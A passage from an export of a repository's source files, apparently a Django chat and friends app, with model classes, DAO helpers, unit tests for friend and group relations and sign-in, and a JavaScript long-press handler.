models.ManyToManyField(User,through='GroupRelation')\n creater_id = models.IntegerField(null=True)\n\n def __unicode__(self):\n return str(self.id)+' '+self.name+' '+self.code+' '+str(self.ucount)+' '+str(self.creater_id)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass Message(models.Model):\n time = models.DateTimeField(default=datetime.datetime.now())\n type = models.IntegerField()\n content_id = models.IntegerField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.type) +' '+str(self.content_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass TextMessage(models.Model):\n message = models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass PictureMessage(models.Model):\n message = models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass VoiceMessage(models.Model):\n message = models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass LocationMessage(models.Model):\n message = models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass BottlePicture(models.Model):\n usedTimes = models.IntegerField()\n tookTime = models.DateTimeField()\n user = models.ForeignKey(User,null=True)\n author = models.CharField(max_length=32,null=True)\n content = models.TextField()\n longitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n latitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n\n def __unicode__(self):\n return str(self.id)+' '+self.author +' '+str(self.tookTime)+' '\\\n +str(self.usedTimes)+' '+str(self.latitude)+' '+str(self.longitude)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass ImmediatelyMessage(models.Model):\n user_from = models.ForeignKey(User)\n message = models.ForeignKey(Message)\n user_to_id = models.IntegerField()\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '\\\n +str(self.user_to_id)+' '+str(self.message_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass AddFriend(models.Model):\n user_from = models.ForeignKey(User)\n user_to_id = models.IntegerField()\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '+str(self.user_to_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass FriendRelation(models.Model):\n user_from = models.ForeignKey(User)\n user_to_id = models.IntegerField()\n time = models.DateTimeField()\n inBlackList = models.BooleanField(default=None)\n remark = models.CharField(max_length=16)\n top = models.BooleanField(default=None)\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '\\\n +str(self.user_to_id)+' '+str(self.time)+' '+str(self.inBlackList)+' '+self.remark+' '+str(self.top)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass GroupRelation(models.Model):\n user = models.ForeignKey(User)\n group = models.ForeignKey(Group)\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_id) +' '+str(self.group_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass GroupMessage(models.Model):\n user_from = models.ForeignKey(User)\n message = models.ForeignKey(Message)\n group_to = models.ForeignKey(Group)\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '+str(self.group_to_id)+' '+str(self.time)+' '+str(self.message_id)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d"
},
{
"alpha_fraction": 0.5784178972244263,
"alphanum_fraction": 0.6172839403152466,
"avg_line_length": 52.34146499633789,
"blob_id": "b157ab2a7c0a617f2bc56b0bb6f6959b9a59321c",
"content_id": "89e5dfc5c6dd152a0dbf00474dda04836c4c8894",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4374,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 82,
"path": "/zzc/adam2014/AllTest/DAOTest/testFriendRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.FriendRelationDAO import *\nfrom adam2014.models import FriendRelation\nfrom adam2014.models import User\nimport datetime\n\n\nclass FriendRelationTest(TestCase):\n def setUp(self):\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user4 = {\"id\":4,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n self.inBlackList = False;\n self.top = False;\n\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n User.objects.create(**self.user4)\n\n\n self.friendRelation1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation2 = {\"id\":2,\"user_from_id\":2,\"user_to_id\":1,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation3 = {\"id\":3,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation4 = {\"id\":4,\"user_from_id\":3,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n\n FriendRelation.objects.create(**self.friendRelation1)\n FriendRelation.objects.create(**self.friendRelation2)\n FriendRelation.objects.create(**self.friendRelation3)\n FriendRelation.objects.create(**self.friendRelation4)\n\n def testInsertFriendRelation(self):\n user_from_id = self.user1['id']\n user_to_id = self.user4['id']\n friendRelation = {\"id\":5,\"user_from_id\":user_from_id,\"user_to_id\":user_to_id,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n friendRelation2 = {\"id\":6,\"user_from_id\":user_to_id,\"user_to_id\":user_from_id,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n before = len(FriendRelation.objects.all())\n print(\"testInsertFriendRelation before:\")\n print(FriendRelation.objects.all())\n insertFriendRelation(**friendRelation)\n insertFriendRelation(**friendRelation2)\n after = len(FriendRelation.objects.all())\n print(\"testInsertFriendRelation 1+4 (4+1) after:\")\n print(FriendRelation.objects.all())\n self.assertEqual(after-before,2)\n\n def testGetFriendRelationById(self):\n print(\"testGetAddFriendById 1&2:\")\n self.assertEqual(getFriendRelationById(1).id,1)\n print(getFriendRelationById(1))\n self.assertEqual(getFriendRelationById(2).id,2)\n print(getFriendRelationById(2))\n\n def testUpdateFriendRelation(self):\n modified_friendRelation = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":False,\"top\":True}\n updateFriendRelation(**modified_friendRelation)\n self.assertEqual(getFriendRelationById(1).top,True)\n print(\"testUpdateFriendRelation top = True\")\n print(getFriendRelationById(1))\n\n def testDeleteFriendRelation(self):\n deleteFriendRelation(1)\n deleteFriendRelation(2)\n deleteFriendRelation(3)\n print(\"testDeleteAddFriend id=1||2||3:\")\n print(FriendRelation.objects.all())\n"
},
{
"alpha_fraction": 0.6663066744804382,
"alphanum_fraction": 0.6943844556808472,
"avg_line_length": 33.712501525878906,
"blob_id": "2a984e2cb955ad559c2bf65a460823dfbe62a249",
"content_id": "8e64984eaea153c41b5fdfc442c9d401b5386f9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3184,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 80,
"path": "/zzc/adam2014/AllTest/ViewTest/testSigninView.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom adam2014.models import User\nfrom django.test import TestCase\nfrom django.test import Client\nimport json\n# 这个Client是用来模拟Get和Post的\n\n# If your tests rely on database access such as creating or querying models, \n# be sure to create your test classes as subclasses of django.test.TestCase rather than unittest.TestCase.\n# Create your tests here.\n# you can simulate requests, insert test data, inspect your application’s output and generally verify your code is doing what it should be doing.\n\n# 每个view一个类去测试\nclass SigninTest(TestCase):\n\tdef setUp(self):\n\t\t# 并不会真的从数据库取数据来测,而是自己设定测试用的数据\n\t\tself.client = Client()\n\n\t\tself.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n\t\tself.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n\t\t\n\t\tself.users = []\n\t\tself.users.append(self.user)\n\t\tself.users.append(self.user2)\n\t\t\n\t\tUser.objects.create(**self.user)\n\t\tUser.objects.create(**self.user2)\n\n\t\tself.code_set = [\"\",]\n\t\tself.phone_set = [\"\",]\n\t\tself.password_set = [\"\",]\n# code phone password\n# 每个变量的有和无一共构成8种情况(苦逼吧),然后对应与每个有,也有存在和不存在两种情况\n# 一共27种情况\n# code_set phone_set password_set\n# 每个set有一个空\n# 如果phone和code同时有,直接失败\n# 如果只有一个,则去filter判断\n\n# 规则\n# \n\tdef makeCodeSet(self):\n\t\tfor a in self.users:\n\t\t\tself.code_set.append(a[\"code\"])\n\t\t\tself.phone_set.append(a[\"phone\"])\n\t\t\tself.password_set.append(a[\"password\"])\n\n\t# 可以通过遍历来简化\n\tdef test_details(self):\n\t\t# 三个for-in\n\t\t# 如果符合二选一并且密码正确的返回成功,不符合返回错误\n\t\tself.makeCodeSet()\n\t\tfor code in self.code_set:\n\t\t\tfor phone in self.phone_set:\n\t\t\t\tif (code and phone) or ((not code) and (not phone)):\n\t\t\t\t\t# 如果两个都有或者两个都无,直接判断失败\n\t\t\t\t\tself.do_test(code,phone,\"whatever\",0)\n\t\t\t\t\tcontinue\n\t\t\t\tfor password in self.password_set:\n\t\t\t\t\t# code和phone二选一才能进入这里\n\t\t\t\t\tif not password: # 如果password为空,直接判断失败\n\t\t\t\t\t\t# print json.dumps({\"code\":code,\"phone\":phone,\"password\":password})\n\t\t\t\t\t\tself.do_test(code,phone,password,0)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif not code == \"\" : # 如果code不为空\n\t\t\t\t\t\tsuccess = User.objects.filter(code=code,password=password) \n\t\t\t\t\telse:\n\t\t\t\t\t\tsuccess = User.objects.filter(phone=phone,password=password)\n\t\t\t\t\t# print json.dumps({\"code\":code,\"phone\":phone,\"password\":password})\n\t\t\t\t\tself.do_test(code,phone,password,len(success))\n\n\tdef do_test(self,code,phone,password,success):\n\t\tjson_string = {\"code\":code,\"phone\":phone,\"password\":password}\n\t\tdata = {\"data\":json.dumps(json_string)}\n\t\tresponse = self.client.post('/adam2014/signin/', data)\n\t\tself.assertEqual(response.content,json.dumps({\n\t\t\"success\":success,\n\t\t}))\n\n"
},
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 21,
"blob_id": "bc6a319205172f471144f02e4afcbde61ff6222d",
"content_id": "3f47eacb549e8cddbdf579f1fb7316393630aa5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/zzc/adam2014/IM/__init__.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n"
},
{
"alpha_fraction": 0.5765543580055237,
"alphanum_fraction": 0.6337989568710327,
"avg_line_length": 45.18987274169922,
"blob_id": "e4df040a2a5c00e90ef735b35affa43a4346ee4b",
"content_id": "23b3fe1977db40545648e0087a9a822026e5d70d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3697,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 79,
"path": "/zzc/adam2014/AllTest/DAOTest/testGroupRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'flower_type'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.UserDAO import *\nfrom adam2014.models import User\nfrom adam2014.DAO.GroupDAO import *\nfrom adam2014.models import Group\nfrom adam2014.DAO.GroupRelationDAO import *\nfrom adam2014.models import GroupRelation\nimport datetime\n\nclass GroupRelationDAO(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"1234567\",\"nickname\":\"frank3\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n self.group1 = {\"id\":1,\"name\":\"groupA\",\"ucount\":1,\"code\":\"535676\",\"creater_id\":1}\n self.group2 = {\"id\":2,\"name\":\"groupB\",\"ucount\":1,\"code\":\"155212\",\"creater_id\":2}\n Group.objects.create(**self.group1)\n Group.objects.create(**self.group2)\n\n self.groupRelation1 = {\"id\":1, \"time\":str(self.time), \"group_id\":1, \"user_id\":1}\n self.groupRelation2 = {\"id\":2, \"time\":str(self.time), \"group_id\":1, \"user_id\":2}\n self.groupRelation3 = {\"id\":3, \"time\":str(self.time), \"group_id\":2, \"user_id\":2}\n self.groupRelation4 = {\"id\":4, \"time\":str(self.time), \"group_id\":2, \"user_id\":3}\n GroupRelation.objects.create(**self.groupRelation1)\n GroupRelation.objects.create(**self.groupRelation2)\n GroupRelation.objects.create(**self.groupRelation3)\n GroupRelation.objects.create(**self.groupRelation4)\n\n\n def test_insertGroupRelation(self):\n print(\"insertTest\")\n print(\"insertInform: id=5, group_id=1, user_id=3\")\n groupRelation5 = {\"id\":5, \"time\":str(self.time), \"group_id\":1, \"user_id\":3}\n before = len(GroupRelation.objects.all())\n insertGroupRelation(**groupRelation5)\n after = len(GroupRelation.objects.all())\n print(\"insertResult:\")\n print(GroupRelation.objects.all())\n self.assertEqual(after-before,1)\n\n\n def test_getGroupRelationById(self):\n print(\"getTest\")\n print(\"getInform: id=1, id=3\")\n print(\"getResult:\")\n print(getGroupRelationById(1))\n print(getGroupRelationById(3))\n self.assertEqual(getGroupRelationById(1).id,1)\n self.assertEqual(getGroupRelationById(3).id,3)\n\n #对于GroupRelation这个表,不需要用到更新这一DAO,故此处进行注释\n # def test_updateGroupRelation(self):\n # print(\"updateTest\")\n # print(\"updateInform: id=1, time\")\n # modified_groupRelation = {\"id\":1, \"time\":\"2014-11-14 23:21:11\", \"group_id\":1, \"user_id\":1}\n # updateGroupRelation(**modified_groupRelation)\n # print(\"updateResult:\")\n # print(getGroupRelationById(1))\n # self.assertEqual(getGroupRelationById(1).time,\"2014-11-14 23:21:11\")\n\n def test_deleteUser(self):\n print(\"deleteTest\")\n print(\"deleteInform: id=1, id=2\")\n deleteGroupRelation(1)\n deleteGroupRelation(2)\n self.assertEqual(len(GroupRelation.objects.filter(id=1)),0)\n self.assertEqual(len(GroupRelation.objects.filter(id=2)),0)\n\n\n"
},
{
"alpha_fraction": 0.7138850092887878,
"alphanum_fraction": 0.7251051664352417,
"avg_line_length": 24.428571701049805,
"blob_id": "301f2297ecc0f4896f561c3d1396dcb1185a011f",
"content_id": "7a3563794c2f909a1cd97849d2c345adac657d3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 713,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 28,
"path": "/zzc/adam2014/DAO/GroupRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\nimport datetime\n\nfrom adam2014.models import GroupRelation\n# class GroupRelation(models.Model):\n# user = models.ForeignKey(User)\n# group = models.ForeignKey(Group)\n# time = models.DateTimeField()\n\ndef insertGroupRelation(**groupRelation):\n g = GroupRelation.objects.create(**groupRelation)\n return g;\n\ndef deleteGroupRelation(id):\n GroupRelation.objects.get(id=id).delete()\n\ndef getGroupRelationById(id):\n return GroupRelation.objects.get(id=id)\n\ndef updateGroupRelation(**kw):\n GroupRelation.objects.filter(id=kw['id']).update(**kw)\n\n"
},
{
"alpha_fraction": 0.676071047782898,
"alphanum_fraction": 0.6927899718284607,
"avg_line_length": 28.90625,
"blob_id": "acdd3f1025c99f2f7f86e1b9ce1eec4d9b977f37",
"content_id": "7dd5881ce202fba6967d817045b04dcfbe63d9bb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1287,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 32,
"path": "/Distance/js/taphold.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "var timeOutEvent=0;//定时器 \n//开始按 \nfunction gtouchstart(obj){ \n timeOutEvent = setTimeout(\"longPress()\",500);//这里设置定时器,定义长按500毫秒触发长按事件,时间可以自己改,个人感觉500毫秒非常合适 \n return false; \n}; \n//手释放,如果在500毫秒内就释放,则取消长按事件,此时可以执行onclick应该执行的事件 \nfunction gtouchend(obj){ \n clearTimeout(timeOutEvent);//清除定时器 \n if(timeOutEvent!=0){ \n //这里写要执行的内容(尤如onclick事件) \n chat(obj);\n } \n return false; \n}; \n//如果手指有移动,则取消所有事件,此时说明用户只是要移动而不是长按 \nfunction gtouchmove(obj){ \n clearTimeout(timeOutEvent);//清除定时器 \n timeOutEvent = 0; \n}; \n \n//真正长按后应该执行的内容 \nfunction longPress(obj){ \n timeOutEvent = 0; \n //执行长按要执行的内容,如弹出菜单 \n document.getElementById(\"changestatediv\").style.display=\"\";\n document.getElementById(\"changestatemarkdiv\").style.display=\"\";\n} \nfunction closechangestatediv(){\n\tdocument.getElementById(\"changestatediv\").style.display=\"none\";\n document.getElementById(\"changestatemarkdiv\").style.display=\"none\";\n}\n"
},
{
"alpha_fraction": 0.5801328420639038,
"alphanum_fraction": 0.6280681490898132,
"avg_line_length": 45.15999984741211,
"blob_id": "5b1151732364d50518aeeff39f152daa48f0cbf3",
"content_id": "118af2c79e64b9564e713de4cfc518780f9db1fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3463,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 75,
"path": "/zzc/adam2014/AllTest/DAOTest/testAddFriendDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.AddFriendDAO import *\nfrom adam2014.models import AddFriend\nfrom adam2014.models import User\nimport datetime\n\nclass AddFriendDAOTest(TestCase):\n def setUp(self):\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user4 = {\"id\":4,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n User.objects.create(**self.user4)\n\n self.addfriend1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time)}\n self.addfriend2 = {\"id\":2,\"user_from_id\":1,\"user_to_id\":3,\"time\":str(self.time)}\n self.addfriend3 = {\"id\":3,\"user_from_id\":1,\"user_to_id\":4,\"time\":str(self.time)}\n self.addfriend4 = {\"id\":4,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time)}\n\n AddFriend.objects.create(**self.addfriend1)\n AddFriend.objects.create(**self.addfriend2)\n AddFriend.objects.create(**self.addfriend3)\n AddFriend.objects.create(**self.addfriend4)\n\n\n\n def testInsertAddFriend(self):\n user_from_id = self.user2['id']\n user_to_id = self.user4['id']\n addfriend = {\"id\":5,\"user_from_id\":user_from_id,\"user_to_id\":user_to_id,\"time\":str(self.time)}\n before = len(AddFriend.objects.all())\n print(\"testInsertAddFriend before:\")\n print(AddFriend.objects.all())\n insertAddFriend(**addfriend)\n after = len(AddFriend.objects.all())\n print(\"testInsertAddFriend after:\")\n print(AddFriend.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetAddFriendById(self):\n print(\"testGetAddFriendById 1&2:\")\n self.assertEqual(getAddFriendByuser_to_id(2)[0].id,1)\n print(getAddFriendByuser_to_id(1))\n print(getAddFriendByuser_to_id(3))\n\n def testUpdateAddFriend(self):\n modified_Add = {\"id\":1,\"user_from_id\":2,\"user_to_id\":1,\"time\":str(self.time)}\n updateAddFriend(**modified_Add)\n self.assertEqual(getAddFriendById(1).user_from_id,2)\n self.assertEqual(getAddFriendById(1).user_to_id,1)\n print(\"testUpdateAddFriend user_from_id=2&user_to_id=1\")\n print(getAddFriendById(1))\n\n def testDeleteAddFriend(self):\n deleteAddFriend(1)\n deleteAddFriend(2)\n deleteAddFriend(3)\n print(\"testDeleteAddFriend id=1||2||3:\")\n print(AddFriend.objects.all())\n\n def testIsFriend(self):\n print \"test is friend or not\"\n addfriend = {\"id\": \"\", \"user_to_id\": 2, \"user_from_id\": 4, \"time\": \"\"}\n try:\n print isFriend(**addfriend)\n except:\n print \"not friend\"\n\n"
},
{
"alpha_fraction": 0.5604355931282043,
"alphanum_fraction": 0.6235934495925903,
"avg_line_length": 43.78861618041992,
"blob_id": "bcf02b483fbb3d963d2d70c581afc8835e08969f",
"content_id": "8b52d5b8c4f71c5d4fba97962a72a5d1f07b0d30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5592,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 123,
"path": "/zzc/adam2014/AllTest/ServiceTest/testUserService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
